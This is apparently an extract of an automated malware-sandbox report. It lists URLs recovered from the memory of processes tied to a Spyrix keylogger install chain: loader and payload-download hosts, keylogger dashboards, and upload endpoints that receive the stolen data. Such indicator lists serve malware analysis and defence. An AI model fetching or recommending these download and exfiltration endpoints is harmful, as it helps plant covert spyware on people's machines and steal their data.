Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/metadata/sandbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/oauth/access_token
Source: spkl.exe String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?SV
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/oauth/request_token
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/oauth/request_token?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/shares/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/shares/sandbox
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://cdn.cdndownload.net/proxy/list.json
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613960897.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1614035419.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk&A
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk77
Source: cmd.exe, 0000000A.00000003.1614181304.00000000007F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk8A
Source: curl.exe, 0000000E.00000002.1613960897.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkE=E3
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkU
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613844777.0000000002B30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613844777.0000000002B30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.0000000001811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: qrl.exe, 00000047.00000000.2538418999.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606859968.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579493629.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000002.2655442094.00000000006BA000.00000008.00000001.01000000.00000017.sdmp String found in binary or memory: https://curl.haxx.se/P
Source: qrl.exe, 00000047.00000000.2538418999.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606859968.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579493629.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000002.2655442094.00000000006BA000.00000008.00000001.01000000.00000017.sdmp String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: qrl.exe String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
Source: qrl.exe String found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://dashboard.actualkeylogger.com
Source: spkl.exe String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-program
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-programspsMapspsJSON
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://dashboard.clevercontrol.com/account/user-hash-gen
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://dashboard.spyrix.com
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dashboard.spyrix.com/
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/qqS
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dashboard.spyrix.com/6s
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dashboard.spyrix.com/;ce
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program?email=
Source: spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dashboard.spyrix.com/ix.com/
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://filedn.com
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1549010969.000001CE89178000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1549010969.000001CE89188000.00000004.00000020.00020000.00000000.sdmp, D0WmCTD2qO.bat String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404Winsta0
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404curl.exe
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, [space]= .exe.6.dr String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6
Source: svchost.exe, 00000008.00000003.1559425141.00000274054E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1559425141.0000027405470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: [space]= .exe.6.dr String found in binary or memory: https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003307000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step1
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003307000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step18
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step2
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
Source: spkl.exe, 00000038.00000003.2605309079.00000000001E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/das
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/av
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/p
Source: qrl.exe, qrl.exe, 00000049.00000002.2608232514.0000000001B8D000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000003.2604925511.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001690000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000003.2614091454.00000000018DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616238123.00000000018DD000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000003.2646135964.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658904799.00000000011DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actions
Source: qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actions.e
Source: qrl.exe, 00000047.00000002.2583125482.00000000010F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actions//swtb-
Source: qrl.exe, 00000047.00000002.2582806090.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2583023321.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001690000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607477587.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615286703.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658177184.0000000000C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsC:
Source: qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsG
Source: qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsOMEPATH-
Source: qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionseDrive
Source: spkl.exe, 00000038.00000002.2726762987.0000000001811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsin
Source: qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsive#
Source: qrl.exe, 00000047.00000002.2583202617.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000003.2578411599.00000000010FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsll
Source: qrl.exe, 00000047.00000002.2583125482.00000000010F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsta=C:
Source: qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsubertl
Source: qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsubertlS
Source: qrl.exe, 0000004B.00000003.2614091454.00000000018DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616238123.00000000018DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu
Source: qrl.exe, 00000049.00000002.2608232514.0000000001B8D000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000003.2604925511.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu7
Source: qrl.exe, 0000004E.00000003.2646135964.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658904799.00000000011DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuuV
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://spyrix.net/dashboard/proxy/upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://spyrix.net/rand.zip
Source: spkl.exe, spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://spyrix.net/usr/monitor/
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/usr/monitor/access.txt
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/usr/monitor/iorder.php?comp_id=
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://spyrix.net/usr/monitor/iupload.php
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spyrix.net/usr/monitor/iupload.phpy
Source: timeout.exe, 0000003D.00000002.2624195057.0000000003488000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.Z
Source: [space]= .tmp, 00000016.00000002.2471948542.0000000006885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyO/
Source: spkl.exe, 00000038.00000002.2726418979.0000000001750000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/
Source: tasklist.exe, 00000057.00000002.2660761706.000000000324F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/C
Source: spmm.exe, 0000004D.00000002.2677681526.0000000002200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download
Source: WMIC.exe, 0000001E.00000002.1940760617.000000000094C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.e5
Source: WMIC.exe, 0000001E.00000003.1940506007.0000000000975000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000021.00000002.1944743593.000001F03FF67000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000021.00000002.1944788946.000001F0401D0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166160354.0000022729BA3000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166110001.0000022729B80000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166160354.0000022729B9A000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000035.00000002.2402235208.0000000003268000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000036.00000002.2410129967.0000000003270000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726418979.0000000001750000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.000000000179E000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2731323017.0000000003410000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000039.00000002.2421738724.0000000003050000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000039.00000002.2420789675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, chcp.com, 0000003C.00000002.2422081708.0000000003110000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000003D.00000002.2624195057.0000000003488000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000003D.00000002.2624261203.0000000004E60000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000040.00000002.2513844325.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000040.00000002.2514115378.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000041.00000002.2463413036.0000000002D10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: reg.exe, 0000002F.00000002.2166160354.0000022729B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&bd
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&s
Source: wscript.exe, 00000039.00000002.2420789675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeG
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJs5
Source: tasklist.exe, 00000059.00000002.2667523224.0000000000450000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000059.00000002.2667760128.0000000000570000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
Source: WMIC.exe, 0000001E.00000003.1940599499.0000000000975000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001E.00000002.1941048881.0000000000975000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001E.00000003.1940506007.0000000000975000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeN
Source: cmd.exe, 0000000A.00000003.1867990577.0000000000804000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867584387.0000000002980000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867688496.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeXsC
Source: WMIC.exe, 0000001E.00000002.1940760617.0000000000940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exec
Source: cmd.exe, 0000000A.00000003.1867990577.0000000000804000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867584387.0000000002980000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867688496.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
Source: WMIC.exe, 0000001A.00000002.1922338845.0000000002D00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exev
Source: regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/f
Source: regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://swtb-download.spyrix-sfk.com/ff
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.certum.pl/repository.0
Source: spkl.exe String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=open
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/auth/drive
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: spkl.exe String found in binary or memory: https://www.googleapis.com/auth/userinfo.prof
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/drive/v2/about
